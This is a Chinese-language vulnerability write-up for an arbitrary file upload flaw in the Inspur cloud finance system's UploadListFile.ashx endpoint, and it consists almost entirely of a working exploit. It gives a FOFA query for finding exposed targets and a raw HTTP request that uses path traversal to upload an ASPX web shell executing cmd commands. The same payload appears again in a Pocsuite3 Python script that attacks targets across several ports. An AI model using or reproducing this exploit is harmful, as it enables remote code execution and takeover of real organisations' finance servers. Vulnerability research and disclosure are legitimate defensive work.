浪潮云财务系统UploadListFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
Fofa
body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"POC
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye
-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
Content-Type: image/png
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------rww5upkbw6ctf0tu5hye--命令执行效果:
Pocsuite3 POC
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.api import OrderedDict, OptString,urlparse
class DemoPOC(POCBase):
vulID = 'huatai-sxk-01' # 必填 漏洞ID,可写CVE,CNVD等常见编号,没有可以不写。
version = '1' # PoC 的版本,默认为 1
author = '司晓凯' # PoC 的作者
vulDate = '2024-9-3' # 漏洞公开日期 (%Y-%m-%d)
createDate = '2025-2-27' # PoC 编写日期 (%Y-%m-%d)
updateDate = '2025-2-27' # PoC 更新日期 (%Y-%m-%d)
references = ['2023攻防演练'] # 漏洞来源地址 必填
name = '浪潮云财务系统UploadListFile存在任意文件上传漏洞' # PoC 名称,建议命令方式:<厂商> <组件> <版本> <漏洞类型> <cve编号>
appPowerLink = 'https://www.inspur.com/lcjtww/2315750/2322129/2322131/2593102/index.html' # 漏洞厂商主页地址
appName = '' # 漏洞应用名称
appVersion = '' # 漏洞影响版本
vulType = 'fileUpload' # 漏洞类型,参见漏洞类型规范表 必填
desc = '/cwbase/EP/ListContent/UploadListFile.ashx接口处允许攻击者上传恶意文件到服务器,导致远程代码执行。' # 漏洞简要描述
samples = [''] # 测试样列,就是用 PoC 测试成功的目标 必填
Cyberspace = {'fofa': ' body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"'} # fofa 语句,鹰图语句等网络空间测绘 必填
def _verify(self):
result = {}
upr = urlparse(self.url.strip('/'))
if upr.port:
ports = [upr.port]
else:
ports = [80,443]
for port in ports:
target = '{}://{}:{}'.format(upr.scheme, upr.hostname, port)
headers = {
'Accept': '/',
'Content-Type': 'multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Connection': 'close'
}
data = '''-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../rce.aspx"
Content-Type: image/png
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------rww5upkbw6ctf0tu5hye--
'''
# 访问/cwbase/rce.aspx即可获取shell,连接参数为cmd
vulurl = '{url}/cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1'.format(url=target)
try:
resp = requests.post(url=vulurl,headers=headers,data=data,verify=False)
#这里写漏洞成功之后,返回的逻辑。如成功之后应包含什么信息
if resp.status_code == 200:
result['URL'] = vulurl
break
except Exception as e:
print(e)
return self.parse_output(result)
def _attack(self):
self._verify()
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(DemoPOC)
